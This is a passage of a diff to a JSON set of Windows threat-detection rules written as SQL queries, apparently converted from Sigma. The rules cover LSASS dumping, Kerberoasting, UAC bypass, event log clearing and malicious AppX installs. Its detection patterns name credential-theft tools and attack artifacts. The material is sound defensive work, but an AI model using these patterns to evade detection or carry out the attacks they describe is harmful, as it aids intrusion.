"attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Office Macro File Creation", - "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion" ], "falsepositives": [ - "Very common in environments that rely heavily on macro documents" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
(TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_office_macro_files_created.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Potential Malicious AppX Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": 
"Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + "attack.t1554" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to 
allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT 
(((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "VSSAudit Security Event Source Registration", + "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." 
], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_security_vssaudit_secevent_source_registration.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' 
OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows 
Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE 
'\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation 
Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Security Event Log Cleared", + "id": "a122ac13-daf8-4175-83a2-72c387be339d", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection 
rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1070.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_event_log_cleared.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "status": "test", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND 
AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "status": "test", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND 